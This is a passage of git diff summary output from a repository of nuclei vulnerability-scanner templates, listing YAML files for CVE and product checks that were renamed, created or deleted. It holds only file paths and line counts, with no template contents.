.../Other/wuzhicms-sqli-11658.yaml | 23 + nuclei-templates/Other/wuzhicms-sqli.yaml | 23 - .../Other/xampp-default-page-11662.yaml | 4 - nuclei-templates/Other/xdcms-sqli-11667.yaml | 37 + nuclei-templates/Other/xdcms-sqli.yaml | 31 - ...ro-login-11673.yaml => xenforo-login.yaml} | 0 .../Other/xenmobile-login-11675.yaml | 23 - nuclei-templates/Other/xenmobile-login.yaml | 19 + .../Other/xerox-efi-lfi-11681.yaml | 28 + nuclei-templates/Other/xerox-efi-lfi.yaml | 33 - .../Other/xerox7-default-login-11680.yaml | 48 + .../Other/xerox7-default-login.yaml | 46 - .../Other/xmlrpc-pingback-ssrf-11687.yaml | 39 + .../Other/xmlrpc-pingback-ssrf.yaml | 28 - nuclei-templates/Other/xp-webcam-11699.yaml | 4 + ....yaml => 
xss-fuzz-html-tag-injection.yaml} | 0 nuclei-templates/Other/xss-fuzz.yaml | 37 + nuclei-templates/Other/xvr-login-11702.yaml | 20 - nuclei-templates/Other/xvr-login-11705.yaml | 24 + .../Other/xxljob-default-login-11712.yaml | 44 + .../Other/xxljob-default-login-11714.yaml | 52 - nuclei-templates/Other/xxljob-panel.yaml | 7 +- ...tect-11720.yaml => yapi-detect-11719.yaml} | 0 ...api-rce-11724.yaml => yapi-rce-11725.yaml} | 0 nuclei-templates/Other/yarn-lock-11728.yaml | 30 - nuclei-templates/Other/yarn-lock-11729.yaml | 25 + .../Other/yarn-manager-exposure-11731.yaml | 19 + .../Other/yarn-manager-exposure-11733.yaml | 17 - .../Other/yarn-resourcemanager-rce-11734.yaml | 23 + .../Other/yarn-resourcemanager-rce-11735.yaml | 21 - .../Other/yii-debugger-11739.yaml | 34 - .../Other/yii-debugger-11740.yaml | 38 + ...ltextfile.yaml => yongyou-ELTextFile.yaml} | 0 .../Other/yongyou-icurrtype-sqli.yaml | 33 - nuclei-templates/Other/yongyou-jdbcRead.yaml | 42 + .../Other/yongyou-ssrf-11745.yaml | 15 + nuclei-templates/Other/yongyou-ssrf.yaml | 16 - ...ml => yonyou-u8-registerservlet-sqli.yaml} | 0 ..._ncchr_attachment_uploadchunk_upload.yaml} | 0 .../Other/yopass-panel-11749.yaml | 19 - nuclei-templates/Other/yopass-panel.yaml | 16 + ...fileread.yaml => yunxintong-fileRead.yaml} | 0 .../Other/zabbix-dashboards-access-11757.yaml | 12 +- .../zabbix-default-credentials-11758.yaml | 27 - .../Other/zabbix-default-credentials.yaml | 22 + .../Other/zabbix-default-login-11762.yaml | 8 +- .../Other/zabbix-error-11764.yaml | 20 - .../Other/zabbix-error-11766.yaml | 19 + .../Other/zabbix-server-login-11767.yaml | 20 - .../Other/zabbix-server-login.yaml | 19 + .../Other/zcms-v3-sqli-11773.yaml | 23 - nuclei-templates/Other/zcms-v3-sqli.yaml | 23 + .../Other/zend-config-file-11778.yaml | 22 + nuclei-templates/Other/zend-config-file.yaml | 37 - .../Other/zendesk-takeover-11781.yaml | 19 + .../Other/zendesk-takeover-11783.yaml | 16 - .../zenphoto-installation-sensitive-info.yaml | 33 - 
.../Other/zenphoto-sensitive-info.yaml | 28 + ...ct-11785.yaml => zentao-detect-11787.yaml} | 0 .../Other/zhiyuan-file-upload-11791.yaml | 33 - .../Other/zhiyuan-file-upload-11794.yaml | 28 + .../Other/zhiyuan-oa-session-leak-11804.yaml | 8 +- ...aml => zhiyuan-oa-unauthorized-11808.yaml} | 0 ...rf-11810.yaml => zimbra-preauth-ssrf.yaml} | 0 .../Other/zimbra-web-client-11814.yaml | 32 - nuclei-templates/Other/zimbra-web-client.yaml | 23 + .../Other/zip-backup-files-11815.yaml | 51 + .../Other/zip-backup-files-11818.yaml | 57 - .../Other/zm-system-log-detect-11833.yaml | 25 + .../Other/zm-system-log-detect-11834.yaml | 21 - .../Other/zoho-webhook-token-11835.yaml | 2 - ...{zuul-panel-11842.yaml => zuul-panel.yaml} | 0 ...\346\234\215\345\212\241\345\231\250.yaml" | 20 + ...4\270\232erp\347\263\273\347\273\237.yaml" | 24 + ...1\200\240erp\347\263\273\347\273\237.yaml" | 19 + ...\347\220\206\345\271\263\345\217\260.yaml" | 21 + ...4\270\232erp\347\263\273\347\273\237.yaml" | 20 + ...\344\272\221\345\271\263\345\217\260.yaml" | 25 + ...\345\256\207\350\247\206vs-isc5000-e.yaml" | 20 + ...\350\275\257\346\212\245\350\241\250.yaml" | 26 + ...\347\255\226\347\263\273\347\273\237.yaml" | 19 + ...45\271\277\350\201\224\350\276\276oa.yaml" | 24 + .../Other/\345\276\256\345\256\217oa.yaml" | 24 + .../Other/\346\205\247\347\202\271oa.yaml" | 19 + ...6\213\223\345\260\224\346\200\235sso.yaml" | 24 + ...6\213\223\345\260\224\346\200\235was.yaml" | 19 + ...\346\214\207\346\216\214\346\230\223.yaml" | 24 + ...\344\272\221\345\271\263\345\217\260.yaml" | 25 + ...346\263\233\345\276\256-oa e-cology8.yaml" | 20 + ...47\250\213\346\226\275\345\267\245oa.yaml" | 20 + ...\344\272\221\345\271\263\345\217\260.yaml" | 21 + ...\345\214\226\347\263\273\347\273\237.yaml" | 26 + ...\345\205\254\345\271\263\345\217\260.yaml" | 21 + ...\345\205\254\350\275\257\344\273\266.yaml" | 27 + ...\347\220\206\350\275\257\344\273\266.yaml" | 33 + ...\347\220\206\350\275\257\344\273\266.yaml" | 20 + 
...\347\220\206\350\275\257\344\273\266.yaml" | 19 + ...\351\233\206\345\233\242\347\211\210.yaml" | 20 + ...\347\220\206\350\275\257\344\273\266.yaml" | 26 + .../Other/\350\207\264\350\277\234a8n.yaml" | 19 + ...\347\273\204\347\273\207\347\211\210.yaml" | 19 + ...\347\273\204\347\273\207\347\211\210.yaml" | 19 + ...\345\205\254\350\275\257\344\273\266.yaml" | 19 + ...\346\234\215\345\212\241\345\231\250.yaml" | 24 + .../Other/\351\223\255\351\243\236mcms.yaml" | 22 + 3802 files changed, 54553 insertions(+), 314894 deletions(-) create mode 100644 nuclei-templates/CVE-2000/CVE-2000-0114.yaml delete mode 100644 nuclei-templates/CVE-2000/cve-2000-0114.yaml delete mode 100644 nuclei-templates/CVE-2006/CVE-2006-1681.yaml create mode 100644 nuclei-templates/CVE-2006/cve-2006-1681.yaml rename nuclei-templates/CVE-2007/{cve-2007-5728.yaml => CVE-2007-5728.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2008/CVE-2008-2398.yaml rename nuclei-templates/CVE-2008/{cve-2008-2650.yaml => CVE-2008-2650.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2008/CVE-2008-4668.yaml delete mode 100644 nuclei-templates/CVE-2008/CVE-2008-6080.yaml create mode 100644 nuclei-templates/CVE-2008/cve-2008-2398.yaml create mode 100644 nuclei-templates/CVE-2008/cve-2008-4668.yaml create mode 100644 nuclei-templates/CVE-2008/cve-2008-6080.yaml rename nuclei-templates/CVE-2009/{cve-2009-0932.yaml => CVE-2009-0932.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-1496.yaml delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-1558.yaml delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-2100.yaml delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-3053.yaml rename nuclei-templates/CVE-2009/{cve-2009-3318.yaml => CVE-2009-3318.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-4202.yaml create mode 100644 nuclei-templates/CVE-2009/CVE-2009-4223.yaml delete mode 100644 nuclei-templates/CVE-2009/CVE-2009-4679.yaml create mode 100644 
nuclei-templates/CVE-2009/cve-2009-1496.yaml create mode 100644 nuclei-templates/CVE-2009/cve-2009-1558.yaml create mode 100644 nuclei-templates/CVE-2009/cve-2009-2100.yaml create mode 100644 nuclei-templates/CVE-2009/cve-2009-3053.yaml create mode 100644 nuclei-templates/CVE-2009/cve-2009-4202.yaml delete mode 100644 nuclei-templates/CVE-2009/cve-2009-4223.yaml create mode 100644 nuclei-templates/CVE-2009/cve-2009-4679.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0219.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0696.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0944.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0972.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0982.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-0985.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1217.yaml rename nuclei-templates/CVE-2010/{cve-2010-1305.yaml => CVE-2010-1305.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1306.yaml => CVE-2010-1306.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1307.yaml => CVE-2010-1307.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1313.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1469.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1470.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1473.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1475.yaml rename nuclei-templates/CVE-2010/{cve-2010-1476.yaml => CVE-2010-1476.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1491.yaml => CVE-2010-1491.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1531.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1532.yaml rename nuclei-templates/CVE-2010/{cve-2010-1534.yaml => CVE-2010-1534.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1540.yaml rename nuclei-templates/CVE-2010/{cve-2010-1601.yaml => CVE-2010-1601.yaml} (100%) rename 
nuclei-templates/CVE-2010/{cve-2010-1602.yaml => CVE-2010-1602.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1653.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1714.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1715.yaml rename nuclei-templates/CVE-2010/{cve-2010-1717.yaml => CVE-2010-1717.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1718.yaml rename nuclei-templates/CVE-2010/{cve-2010-1719.yaml => CVE-2010-1719.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1722.yaml => CVE-2010-1722.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1871.yaml rename nuclei-templates/CVE-2010/{cve-2010-1878.yaml => CVE-2010-1878.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1952.yaml => CVE-2010-1952.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-1953.yaml => CVE-2010-1953.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1954.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1957.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-1979.yaml rename nuclei-templates/CVE-2010/{cve-2010-1983.yaml => CVE-2010-1983.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2033.yaml => CVE-2010-2033.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-2035.yaml rename nuclei-templates/CVE-2010/{cve-2010-2050.yaml => CVE-2010-2050.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2128.yaml => CVE-2010-2128.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-2259.yaml rename nuclei-templates/CVE-2010/{cve-2010-2307.yaml => CVE-2010-2307.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2861.yaml => CVE-2010-2861.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-2918.yaml => CVE-2010-2918.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-2920.yaml delete mode 100644 nuclei-templates/CVE-2010/CVE-2010-3426.yaml create mode 100644 nuclei-templates/CVE-2010/CVE-2010-4239.yaml rename 
nuclei-templates/CVE-2010/{cve-2010-4617.yaml => CVE-2010-4617.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-4769.yaml => CVE-2010-4769.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-5028.yaml => CVE-2010-5028.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-5278.yaml => CVE-2010-5278.yaml} (100%) rename nuclei-templates/CVE-2010/{cve-2010-5286.yaml => CVE-2010-5286.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-0219.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-0696.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-0944.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-0972.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-0982.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-0985.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1056.yaml => cve-2010-1056.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1217.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1313.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1314.yaml => cve-2010-1314.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1469.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1470.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1473.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1475.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1495.yaml => cve-2010-1495.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1531.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1532.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1540.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1653.yaml rename nuclei-templates/CVE-2010/{CVE-2010-1658.yaml => cve-2010-1658.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-1714.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1715.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1718.yaml create mode 100644 
nuclei-templates/CVE-2010/cve-2010-1871.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1954.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1957.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-1979.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-2035.yaml rename nuclei-templates/CVE-2010/{CVE-2010-2045.yaml => cve-2010-2045.yaml} (100%) create mode 100644 nuclei-templates/CVE-2010/cve-2010-2259.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-2920.yaml create mode 100644 nuclei-templates/CVE-2010/cve-2010-3426.yaml delete mode 100644 nuclei-templates/CVE-2010/cve-2010-4239.yaml rename nuclei-templates/CVE-2011/{cve-2011-1669.yaml => CVE-2011-1669.yaml} (100%) rename nuclei-templates/CVE-2011/{cve-2011-2780.yaml => CVE-2011-2780.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2011/CVE-2011-4336.yaml rename nuclei-templates/CVE-2011/{cve-2011-4624.yaml => CVE-2011-4624.yaml} (100%) create mode 100644 nuclei-templates/CVE-2011/cve-2011-4336.yaml rename nuclei-templates/CVE-2011/{CVE-2011-5106.yaml => cve-2011-5106.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-0392.yaml delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-0896.yaml rename nuclei-templates/CVE-2012/{cve-2012-1823.yaml => CVE-2012-1823.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-1835.yaml rename nuclei-templates/CVE-2012/{cve-2012-2371.yaml => CVE-2012-2371.yaml} (100%) rename nuclei-templates/CVE-2012/{cve-2012-3153.yaml => CVE-2012-3153.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-4253.yaml delete mode 100644 nuclei-templates/CVE-2012/CVE-2012-4547.yaml rename nuclei-templates/CVE-2012/{cve-2012-4889.yaml => CVE-2012-4889.yaml} (100%) create mode 100644 nuclei-templates/CVE-2012/cve-2012-0392.yaml create mode 100644 nuclei-templates/CVE-2012/cve-2012-0896.yaml rename nuclei-templates/CVE-2012/{CVE-2012-0901.yaml => cve-2012-0901.yaml} (100%) create mode 100644 
nuclei-templates/CVE-2012/cve-2012-1835.yaml create mode 100644 nuclei-templates/CVE-2012/cve-2012-4253.yaml rename nuclei-templates/CVE-2012/{CVE-2012-4273.yaml => cve-2012-4273.yaml} (100%) create mode 100644 nuclei-templates/CVE-2012/cve-2012-4547.yaml rename nuclei-templates/CVE-2013/{cve-2013-2251.yaml => CVE-2013-2251.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2013/CVE-2013-2287.yaml delete mode 100644 nuclei-templates/CVE-2013/CVE-2013-3526.yaml create mode 100644 nuclei-templates/CVE-2013/CVE-2013-6281.yaml rename nuclei-templates/CVE-2013/{cve-2013-7240.yaml => CVE-2013-7240.yaml} (100%) create mode 100644 nuclei-templates/CVE-2013/cve-2013-2287.yaml create mode 100644 nuclei-templates/CVE-2013/cve-2013-3526.yaml delete mode 100644 nuclei-templates/CVE-2013/cve-2013-6281.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-1203.yaml create mode 100644 nuclei-templates/CVE-2014/CVE-2014-2321.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-2323.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-2383.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-2962.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-3120.yaml delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-3206.yaml rename nuclei-templates/CVE-2014/{cve-2014-3704.yaml => CVE-2014-3704.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4210.yaml => CVE-2014-4210.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-4535.yaml rename nuclei-templates/CVE-2014/{cve-2014-4539.yaml => CVE-2014-4539.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4544.yaml => CVE-2014-4544.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4550.yaml => CVE-2014-4550.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4592.yaml => CVE-2014-4592.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-4940.yaml => CVE-2014-4940.yaml} (100%) create mode 100644 nuclei-templates/CVE-2014/CVE-2014-4942.yaml rename 
nuclei-templates/CVE-2014/{cve-2014-5258.yaml => CVE-2014-5258.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-5368.yaml => CVE-2014-5368.yaml} (100%) rename nuclei-templates/CVE-2014/{cve-2014-6271.yaml => CVE-2014-6271.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-8799.yaml rename nuclei-templates/CVE-2014/{cve-2014-9444.yaml => CVE-2014-9444.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2014/CVE-2014-9608.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-1203.yaml delete mode 100644 nuclei-templates/CVE-2014/cve-2014-2321.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-2323.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-2383.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-2962.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-3120.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-3206.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-4535.yaml delete mode 100644 nuclei-templates/CVE-2014/cve-2014-4942.yaml rename nuclei-templates/CVE-2014/{CVE-2014-8682.yaml => cve-2014-8682.yaml} (100%) create mode 100644 nuclei-templates/CVE-2014/cve-2014-8799.yaml create mode 100644 nuclei-templates/CVE-2014/cve-2014-9608.yaml rename nuclei-templates/CVE-2015/{cve-2015-0554.yaml => CVE-2015-0554.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-1000012.yaml rename nuclei-templates/CVE-2015/{cve-2015-1880.yaml => CVE-2015-1880.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-2067.yaml rename nuclei-templates/CVE-2015/{cve-2015-2068.yaml => CVE-2015-2068.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-3224.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-3337.yaml rename nuclei-templates/CVE-2015/{cve-2015-3897.yaml => CVE-2015-3897.yaml} (100%) rename nuclei-templates/CVE-2015/{cve-2015-4414.yaml => CVE-2015-4414.yaml} (100%) rename nuclei-templates/CVE-2015/{cve-2015-5461.yaml => CVE-2015-5461.yaml} (100%) 
delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-5471.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-6544.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-7377.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-7450.yaml delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-7823.yaml rename nuclei-templates/CVE-2015/{cve-2015-8349.yaml => CVE-2015-8349.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2015/CVE-2015-8399.yaml rename nuclei-templates/CVE-2015/{cve-2015-8813.yaml => CVE-2015-8813.yaml} (100%) rename nuclei-templates/CVE-2015/{cve-2015-9414.yaml => CVE-2015-9414.yaml} (100%) create mode 100644 nuclei-templates/CVE-2015/cve-2015-1000012.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-2067.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-3224.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-3337.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-5471.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-6544.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-7377.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-7450.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-7823.yaml create mode 100644 nuclei-templates/CVE-2015/cve-2015-8399.yaml rename nuclei-templates/CVE-2015/{CVE-2015-9480.yaml => cve-2015-9480.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-0957.yaml => CVE-2016-0957.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000128.yaml => CVE-2016-1000128.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000131.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000133.yaml rename nuclei-templates/CVE-2016/{cve-2016-1000138.yaml => CVE-2016-1000138.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000139.yaml => CVE-2016-1000139.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000140.yaml => CVE-2016-1000140.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-1000142.yaml => 
CVE-2016-1000142.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000143.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000149.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000152.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-1000154.yaml delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-10033.yaml rename nuclei-templates/CVE-2016/{cve-2016-10924.yaml => CVE-2016-10924.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-10960.yaml => CVE-2016-10960.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-2389.yaml => CVE-2016-2389.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-3081.yaml => CVE-2016-3081.yaml} (100%) rename nuclei-templates/CVE-2016/{cve-2016-3978.yaml => CVE-2016-3978.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-4977.yaml create mode 100644 nuclei-templates/CVE-2016/CVE-2016-6210.yaml rename nuclei-templates/CVE-2016/{cve-2016-7552.yaml => CVE-2016-7552.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2016/CVE-2016-8527.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000131.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000133.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000143.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000149.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000152.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-1000154.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-10033.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-4977.yaml delete mode 100644 nuclei-templates/CVE-2016/cve-2016-6210.yaml create mode 100644 nuclei-templates/CVE-2016/cve-2016-8527.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-1000028.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-10271.yaml rename nuclei-templates/CVE-2017/{cve-2017-10974.yaml => CVE-2017-10974.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-11610.yaml 
rename nuclei-templates/CVE-2017/{cve-2017-12149.yaml => CVE-2017-12149.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-12544.yaml => CVE-2017-12544.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-12611.yaml => CVE-2017-12611.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-12615.yaml => CVE-2017-12615.yaml} (100%) rename nuclei-templates/CVE-2017/{cve-2017-12629.yaml => CVE-2017-12629.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-12794.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-14535.yaml rename nuclei-templates/CVE-2017/{cve-2017-14651.yaml => CVE-2017-14651.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-15287.yaml rename nuclei-templates/CVE-2017/{cve-2017-15363.yaml => CVE-2017-15363.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-15647.yaml rename nuclei-templates/CVE-2017/{cve-2017-16806.yaml => CVE-2017-16806.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-17451.yaml rename nuclei-templates/CVE-2017/{cve-2017-3528.yaml => CVE-2017-3528.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-4011.yaml rename nuclei-templates/CVE-2017/{cve-2017-5638.yaml => CVE-2017-5638.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-6090.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-7615.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-8917.yaml rename nuclei-templates/CVE-2017/{cve-2017-9288.yaml => CVE-2017-9288.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-9791.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-9833.yaml delete mode 100644 nuclei-templates/CVE-2017/CVE-2017-9841.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-1000028.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-10271.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-11610.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-12794.yaml create mode 100644 
nuclei-templates/CVE-2017/cve-2017-14535.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-15287.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-15647.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-17451.yaml rename nuclei-templates/CVE-2017/{CVE-2017-18536.yaml => cve-2017-18536.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/cve-2017-4011.yaml rename nuclei-templates/CVE-2017/{CVE-2017-5487.yaml => cve-2017-5487.yaml} (100%) create mode 100644 nuclei-templates/CVE-2017/cve-2017-6090.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-7615.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-8917.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-9791.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-9833.yaml create mode 100644 nuclei-templates/CVE-2017/cve-2017-9841.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-1000856.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-1000861.yaml rename nuclei-templates/CVE-2018/{cve-2018-10201.yaml => CVE-2018-10201.yaml} (100%) create mode 100644 nuclei-templates/CVE-2018/CVE-2018-10230.yaml rename nuclei-templates/CVE-2018/{cve-2018-10818.yaml => CVE-2018-10818.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-10823.yaml => CVE-2018-10823.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-10956.yaml create mode 100644 nuclei-templates/CVE-2018/CVE-2018-11231.yaml rename nuclei-templates/CVE-2018/{cve-2018-11510.yaml => CVE-2018-11510.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-11709.yaml => CVE-2018-11709.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-11776.yaml delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-11784.yaml rename nuclei-templates/CVE-2018/{cve-2018-12031.yaml => CVE-2018-12031.yaml} (100%) rename nuclei-templates/CVE-2018/{cve-2018-12054.yaml => CVE-2018-12054.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2018/CVE-2018-12300.yaml delete mode 100644 
